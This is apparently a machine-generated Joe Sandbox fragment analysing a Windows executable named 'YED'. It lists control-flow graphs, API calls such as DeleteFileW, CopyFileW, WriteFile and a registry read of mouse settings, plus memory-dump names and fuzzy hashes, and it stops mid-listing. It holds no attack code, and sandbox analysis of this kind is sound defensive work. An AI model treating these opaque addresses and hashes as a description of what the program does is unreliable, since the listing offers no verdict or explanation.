                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002382D9,002382D9,?,?,?,0024644F,00000001,00000001,8BE85006), ref: 00246258
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0024644F,00000001,00000001,8BE85006,?,?,?), ref: 002462DE
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002463D8
                                                                                                                                                • __freea.LIBCMT ref: 002463E5
                                                                                                                                                  • Part of subcall function 00243820: RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852
                                                                                                                                                • __freea.LIBCMT ref: 002463EE
                                                                                                                                                • __freea.LIBCMT ref: 00246413
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                • Opcode ID: 9450f27ce63f3679c390409332ff2917e15a84c09e50c278c78fcd6b9f95a93a
                                                                                                                                                • Instruction ID: 2ce221695e6dd40d9fd67c67914a89e615e6e5cf85851ff9874241b5d35e8d8a
                                                                                                                                                • Opcode Fuzzy Hash: 9450f27ce63f3679c390409332ff2917e15a84c09e50c278c78fcd6b9f95a93a
                                                                                                                                                • Instruction Fuzzy Hash: E4513772620207ABDB2D8FA0CC89EAF7BA9EF46B10F144269FC05D6140DB74DC60CA61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1513 282947-2829b9 call 251f50 call 2825d6 call 22fe0b call 215722 call 28274e call 21511f call 235232 1528 282a6c-282a73 call 282e66 1513->1528 1529 2829bf-2829c6 call 282e66 1513->1529 1534 282a7c 1528->1534 1535 282a75-282a77 1528->1535 1529->1535 1536 2829cc-282a6a call 23d583 call 234983 call 239038 call 23d583 call 239038 * 2 1529->1536 1539 282a7f-282b3a call 2150f5 * 8 call 283017 call 23e5eb 1534->1539 1537 282cb6-282cb7 1535->1537 1536->1539 1542 282cd5-282cdb 1537->1542 1578 282b3c-282b3e 1539->1578 1579 282b43-282b5e call 282792 1539->1579 1543 282cdd-282ce8 call 22fdcd call 22fe14 1542->1543 1544 282cf0-282cf6 1542->1544 1556 282ced 1543->1556 1556->1544 1578->1537 1582 282bf0-282bfc call 23e678 1579->1582 1583 282b64-282b6c 1579->1583 1590 282bfe-282c0d DeleteFileW 1582->1590 1591 282c12-282c16 1582->1591 1584 282b6e-282b72 1583->1584 1585 282b74 1583->1585 1587 282b79-282b97 call 2150f5 1584->1587 1585->1587 1595 282b99-282b9e 1587->1595 1596 282bc1-282bd7 call 28211d call 23dbb3 1587->1596 1590->1537 1593 282c18-282c7e call 2825d6 call 23d2eb * 2 call 2822ce 1591->1593 1594 282c91-282ca5 CopyFileW 1591->1594 1598 282cb9-282ccf DeleteFileW call 282fd8 1593->1598 1618 282c80-282c8f DeleteFileW 1593->1618 1594->1598 1599 282ca7-282cb4 DeleteFileW 1594->1599 1601 282ba1-282bb4 call 2828d2 1595->1601 1613 282bdc-282be7 1596->1613 1604 282cd4 1598->1604 1599->1537 1611 282bb6-282bbf 1601->1611 1604->1542 1611->1596 1613->1583 1615 282bed 1613->1615 1615->1582 1618->1537
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00282C05
                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00282C87
                                                                                                                                                • CopyFileW.KERNEL32 ref: 00282C9D
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00282CAE
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00282CC0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Delete$Copy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3226157194-0
                                                                                                                                                • Opcode ID: f4c54a059ed786ef46f47e1ac6e71b06789d3549ef798685e22137fa6fe69a7d
                                                                                                                                                • Instruction ID: e47a6aa49e7a5a916af32d1ccc4aabd7bc380b7c01c29b7b6053d96f05de4d0e
                                                                                                                                                • Opcode Fuzzy Hash: f4c54a059ed786ef46f47e1ac6e71b06789d3549ef798685e22137fa6fe69a7d
                                                                                                                                                • Instruction Fuzzy Hash: AFB170B1D21129EBDF15EFA4CC85EDEB7BDEF49310F1040A6F509E6181EA319A588F60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1619 245aa9-245ace 1620 245ad7-245ad9 1619->1620 1621 245ad0-245ad2 1619->1621 1623 245afa-245b1f 1620->1623 1624 245adb-245af5 call 23f2c6 call 23f2d9 call 2427ec 1620->1624 1622 245ca5-245cb4 call 230a8c 1621->1622 1626 245b26-245b2c 1623->1626 1627 245b21-245b24 1623->1627 1624->1622 1631 245b2e-245b46 call 23f2c6 call 23f2d9 call 2427ec 1626->1631 1632 245b4b 1626->1632 1627->1626 1630 245b4e-245b53 1627->1630 1635 245b64-245b6d call 24564e 1630->1635 1636 245b55-245b61 call 249424 1630->1636 1666 245c9c-245c9f 1631->1666 1632->1630 1648 245b6f-245b71 1635->1648 1649 245ba8-245bba 1635->1649 1636->1635 1653 245b95-245b9e call 24542e 1648->1653 1654 245b73-245b78 1648->1654 1651 245c02-245c23 WriteFile 1649->1651 1652 245bbc-245bc2 1649->1652 1656 245c25-245c2b GetLastError 1651->1656 1657 245c2e 1651->1657 1659 245bc4-245bc7 1652->1659 1660 245bf2-245c00 call 2456c4 1652->1660 1667 245ba3-245ba6 1653->1667 1661 245c6c-245c7e 1654->1661 1662 245b7e-245b8b call 2455e1 1654->1662 1656->1657 1668 245c31-245c3c 1657->1668 1669 245be2-245bf0 call 245891 1659->1669 1670 245bc9-245bcc 1659->1670 1660->1667 1664 245c80-245c83 1661->1664 1665 245c89-245c99 call 23f2d9 call 23f2c6 1661->1665 1676 245b8e-245b90 1662->1676 1664->1665 1674 245c85-245c87 1664->1674 1665->1666 1680 245ca4 1666->1680 1667->1676 1677 245ca1 1668->1677 1678 245c3e-245c43 1668->1678 1669->1667 1670->1661 1679 245bd2-245be0 call 2457a3 1670->1679 1674->1680 1676->1668 1677->1680 1683 245c45-245c4a 1678->1683 1684 245c69 1678->1684 1679->1667 1680->1622 1688 245c60-245c67 call 23f2a3 1683->1688 1689 245c4c-245c5e call 23f2d9 call 23f2c6 1683->1689 1684->1661 1688->1666 1689->1666
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: JO!
                                                                                                                                                • API String ID: 0-3116667536
                                                                                                                                                • Opcode ID: 3d874f82bf57cb7cebc9cac489df768c0afe6e47bcfc19f2088db2f10080f813
                                                                                                                                                • Instruction ID: 3416695e58f034b95e0c1adc1dada47f00f231f83e3bddcc9f56afcb170b3322
                                                                                                                                                • Opcode Fuzzy Hash: 3d874f82bf57cb7cebc9cac489df768c0afe6e47bcfc19f2088db2f10080f813
                                                                                                                                                • Instruction Fuzzy Hash: 4151E4B1D3062ADFCB189FA4D985FAEBBB4EF05314F14005AF445AB293D6708921CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1734 213b1c-213b27 1735 213b99-213b9b 1734->1735 1736 213b29-213b2e 1734->1736 1737 213b8c-213b8f 1735->1737 1736->1735 1738 213b30-213b48 RegOpenKeyExW 1736->1738 1738->1735 1739 213b4a-213b69 RegQueryValueExW 1738->1739 1740 213b80-213b8b RegCloseKey 1739->1740 1741 213b6b-213b76 1739->1741 1740->1737 1742 213b90-213b97 1741->1742 1743 213b78-213b7a 1741->1743 1744 213b7e 1742->1744 1743->1744 1744->1740
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00213B40
                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00213B61
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00213B83
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                                • Opcode ID: fc28918cf4dbf8bcebf709989fae1f49deb6b7d1613504cbcce4a49d33dfd76a
                                                                                                                                                • Instruction ID: 63d65937bec4ac696d65e6d35c5ce4df387746fdf52b08e9acf0c0de9932a7ee
                                                                                                                                                • Opcode Fuzzy Hash: fc28918cf4dbf8bcebf709989fae1f49deb6b7d1613504cbcce4a49d33dfd76a
                                                                                                                                                • Instruction Fuzzy Hash: 04115AB1524209FFDB20CFA4DC48AEFB7F9EF11748B104469A805D7210E6319F949760
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002113C6,00000000,00000000,?,0024301A,002113C6,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue), ref: 002430A5
                                                                                                                                                • GetLastError.KERNEL32(?,0024301A,002113C6,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue,002B2290,FlsSetValue,00000000,00000364,?,00242E46), ref: 002430B1
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0024301A,002113C6,00000000,00000000,00000000,?,0024328B,00000006,FlsSetValue,002B2290,FlsSetValue,00000000), ref: 002430BF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                • Opcode ID: ba8931e33bb0e0d6941f9da7ca84bff0acbd3ed674a8fb31a22c130d2a2efae0
                                                                                                                                                • Instruction ID: fe55c722081547982f167a622ca8031f10c3714c1f4c8e0f611ff8b47e6c714c
                                                                                                                                                • Opcode Fuzzy Hash: ba8931e33bb0e0d6941f9da7ca84bff0acbd3ed674a8fb31a22c130d2a2efae0
                                                                                                                                                • Instruction Fuzzy Hash: 3001F732331223ABCB35CF78AC88A577BD8AF46B61B200720F905E7140CB21D925C6E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00252C8C
                                                                                                                                                  • Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2
                                                                                                                                                  • Part of subcall function 00212DA5: GetLongPathNameW.KERNEL32 ref: 00212DC4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                • String ID: X$`e-
                                                                                                                                                • API String ID: 779396738-4103291849
                                                                                                                                                • Opcode ID: 54abb68aaba519649c14ae3e3b646b693d2128993dc2e226e9098f71448a8f32
                                                                                                                                                • Instruction ID: 1e07cd88ba7b0adc5977d5da939ede8118732a9a7b16b4c745f60f474521c986
                                                                                                                                                • Opcode Fuzzy Hash: 54abb68aaba519649c14ae3e3b646b693d2128993dc2e226e9098f71448a8f32
                                                                                                                                                • Instruction Fuzzy Hash: 0A21D570A20298DFCB01EF94D849BEE7BF8AF59305F00405AE405B7241DBB49AAD8F61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00230668
                                                                                                                                                  • Part of subcall function 002332A4: RaiseException.KERNEL32(?,?,?,0023068A,?,002E1444,?,?,?,?,?,?,0023068A,00211129,002D8738,00211129), ref: 00233304
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00230685
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                • Opcode ID: 73a0be61fc2b5bd5e46f34f5d6482102259d74231b1c0bd304565f8f71f13e80
                                                                                                                                                • Instruction ID: 3ffd39be4ae7ac3ef376eca598717b9e55711b0b404cca2784b28193419f5991
                                                                                                                                                • Opcode Fuzzy Hash: 73a0be61fc2b5bd5e46f34f5d6482102259d74231b1c0bd304565f8f71f13e80
                                                                                                                                                • Instruction Fuzzy Hash: F7F0AFA492020E77CB00BAA4E896C9E777C6E01310FA04571B92496595EF71EA758D90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0028302F
                                                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00283044
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                                • String ID: aut
                                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                                • Opcode ID: d8bf7a411720b6a0e60e7731bad573479d762e88bdbc6a8ad5c3434be97d8242
                                                                                                                                                • Instruction ID: dc14ae46a32994df9cbb2a79cf3e77575cda35fbcc5de6cebf33a46ba1a079be
                                                                                                                                                • Opcode Fuzzy Hash: d8bf7a411720b6a0e60e7731bad573479d762e88bdbc6a8ad5c3434be97d8242
                                                                                                                                                • Instruction Fuzzy Hash: 4FD05E7250032867DA20A7A4AD0EFCB3B6CDB06750F0002A2BA96E2091DEB09984CAD0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002982F5
                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 002982FC
                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 002984DD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 146820519-0
                                                                                                                                                • Opcode ID: 2f04d24c8b74988fa7506a8b710aa6bb53ca4ba6bd56a8fff9e39b495ac3f696
                                                                                                                                                • Instruction ID: cbf05c7bc0ead59aee23163524c90436a9602a7132c507a9627497189e0e9d07
                                                                                                                                                • Opcode Fuzzy Hash: 2f04d24c8b74988fa7506a8b710aa6bb53ca4ba6bd56a8fff9e39b495ac3f696
                                                                                                                                                • Instruction Fuzzy Hash: C3127C71A183419FCB14DF28C484B6ABBE5FF85314F18895DE8898B252CB31ED55CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00211BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00211BF4
                                                                                                                                                  • Part of subcall function 00211BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00211BFC
                                                                                                                                                  • Part of subcall function 00211BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00211C07
                                                                                                                                                  • Part of subcall function 00211BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00211C12
                                                                                                                                                  • Part of subcall function 00211BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00211C1A
                                                                                                                                                  • Part of subcall function 00211BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00211C22
                                                                                                                                                  • Part of subcall function 00211B4A: RegisterWindowMessageW.USER32(00000004,?,002112C4), ref: 00211BA2
                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0021136A
                                                                                                                                                • OleInitialize.OLE32 ref: 00211388
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002524AB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1986988660-0
                                                                                                                                                • Opcode ID: 0b1072b72360fd280b93e5165dc7eff89359d6b0e145d17b735b9dfac472880c
                                                                                                                                                • Instruction ID: 72f124cb969b68c8d878e80284faf51f5e7100ccc51fa12bdbbbb25446a5c5fe
                                                                                                                                                • Opcode Fuzzy Hash: 0b1072b72360fd280b93e5165dc7eff89359d6b0e145d17b735b9dfac472880c
                                                                                                                                                • Instruction Fuzzy Hash: 2F7180B49A13C18FD784DF7AB9C96A93AE4FB99344394413AD40ACB3A1EB3044B5CF51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001), ref: 0021556D
                                                                                                                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 0021557D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                • Opcode ID: cd628c3ad2d990bee5eb8730a6e11642409526534c632a4e35e027934595a3ad
                                                                                                                                                • Instruction ID: 06ec8731183b494c749906c1f49d1b19e5c2b002adf054c42e345debf5706f4c
                                                                                                                                                • Opcode Fuzzy Hash: cd628c3ad2d990bee5eb8730a6e11642409526534c632a4e35e027934595a3ad
                                                                                                                                                • Instruction Fuzzy Hash: 1F314D71A1061AFFDB14CF28C880B99B7F6FB54314F148269E91597240D771FDA4CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00248704
                                                                                                                                                • GetLastError.KERNEL32(?,002485CC,?,002D8CC8,0000000C), ref: 0024870E
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00248739
                                                                                                                                                Memory Dump Source
